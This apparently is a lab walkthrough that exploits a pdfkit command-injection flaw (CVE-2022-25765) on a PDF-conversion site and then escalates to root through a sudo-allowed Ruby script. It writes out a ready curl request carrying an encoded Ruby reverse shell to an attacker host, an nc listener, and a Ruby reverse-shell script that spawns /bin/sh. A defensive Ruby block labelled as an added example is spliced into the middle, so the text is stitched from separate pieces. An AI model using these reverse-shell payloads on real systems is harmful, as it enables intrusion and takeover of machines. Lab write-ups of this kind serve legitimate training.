Enumeration

Nmap

The initial nmap scan revealed that SSH and port 3000 were open.

[Screenshot: 00 - nmap]

Web Enumeration

The website had a single input point, which converts the page at a given URL to a PDF.

[Screenshot: 01 - website]

However, entering random values revealed that the page was using PDFKit for this operation.

[Screenshot: 02 - pdf]

Exploitation

CVE-2022-25765

The pdfkit package (versions from 0.0.0) is vulnerable to command injection because the URL is not properly sanitized.

Some research revealed that we could exploit this to obtain remote command execution. I found a GitHub repo named shamo0/PDFkit-CMD-Injection which explains this exploitation in detail.
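The root cause of CVE-2022-25765 is that the user-supplied URL ends up inside a shell-parsed command string. The Ruby below is an added example (not code from this writeup and not pdfkit's own source) of the defender-side controls: validating the URL, invoking the converter with an argv array so no shell is involved, and a check that flags a logged url parameter carrying shell metacharacters. The wkhtmltopdf argv shape, the SHELL_META deny-list and the probe URL are my assumptions, constructed for illustration.

```ruby
require 'uri'

# Constructed illustration of the unsafe pattern behind CVE-2022-25765:
# the user-supplied URL is interpolated into one command string that a
# shell parses, so a backtick inside the URL is executed as a command.
def unsafe_command_string(url)
  "wkhtmltopdf --quiet #{url} -"
end

# Constructed deny-list (assumption): characters a URL this app fetches
# never needs, covering the backtick, quotes, whitespace and $(...) that
# shell-based injection relies on. '&' stays allowed for query strings.
SHELL_META = /[`$'"\\;|()<>\s\x00-\x1f]/

# Control 1: validate the URL before it reaches any process. Returns the
# normalised URL string or raises ArgumentError.
def validate_url(input)
  raise ArgumentError, 'shell metacharacter in URL' if input.match?(SHELL_META)
  uri = URI.parse(input)
  raise ArgumentError, 'only http/https allowed' unless %w[http https].include?(uri.scheme)
  raise ArgumentError, 'missing host' if uri.host.to_s.empty?
  uri.to_s
rescue URI::InvalidURIError => e
  raise ArgumentError, "not a URI: #{e.message}"
end

# Control 2 (the real fix): hand the URL to the converter as a separate
# argv element. Process.spawn / Open3 with an array never invokes /bin/sh,
# so metacharacters are passed literally instead of being interpreted.
def safe_argv(input)
  ['wkhtmltopdf', '--quiet', validate_url(input), '-']
end

# Detection: flag a form-encoded url parameter (as it appears in a request
# log) whose decoded value carries shell metacharacters.
def injection_attempt?(raw_param)
  URI.decode_www_form_component(raw_param).match?(SHELL_META)
end

# Constructed probe, not the page's payload: a harmless backtick command.
CONSTRUCTED_PROBE = 'http://203.0.113.5/?name=%20`id`'

if __FILE__ == $PROGRAM_NAME
  puts unsafe_command_string(CONSTRUCTED_PROBE)   # backtick would reach a shell
  p safe_argv('https://example.com/page?x=1')     # URL is a single argv element
  p injection_attempt?('http%3A%2F%2F203.0.113.5%2F%3Fname%3D%2520%60id%60')
end
```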

[Screenshot: 03 - exploit for pdfkit]

All I needed to do was run the commands below in different terminals to get a reverse shell.

## first terminal
python3 -m http.server 80

## second terminal
sudo rlwrap nc -nlvp 4444

## third terminal (update IP and PORT values)
curl 'http://192.168.157.22:3000' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.157.22:3000' -H 'Connection: keep-alive' -H 'Referer: http://192.168.157.22:3000' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F192.168.45.220%3A80%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22192.168.45.220%22%2C4444%29%29%27%60'

[Screenshot: 06 - exploiting]

And by running the last command, I got the user shell.

[Screenshot: 07 - local flag]

Privilege Escalation

sudo NOPASSWD ruby over a writable .rb file

The sudo -l command revealed that the user had NOPASSWD ruby privileges over an app.rb file to which we had write access.

[Screenshot: 08 - sudo -l]

First, I created a malicious app.rb file as seen below.

#!/usr/bin/env ruby
# syscall 33 = dup2 on 64-bit Linux
# syscall 63 = dup2 on 32-bit Linux
# test with nc -lvp 1337

require 'socket'

# AF_INET = 2, SOCK_STREAM = 1
s = Socket.new 2,1
s.connect Socket.sockaddr_in 1337, '192.168.45.220'

# duplicate the socket over stdin, stdout and stderr
[0,1,2].each { |fd| syscall 33, s.fileno, fd }
exec '/bin/sh -i'

Then I transferred it to the target machine.

[Screenshot: 10 - transferred]

And executing it got me a root shell.

[Screenshot: 11 - executed it]

[Screenshot: 12 - gg]
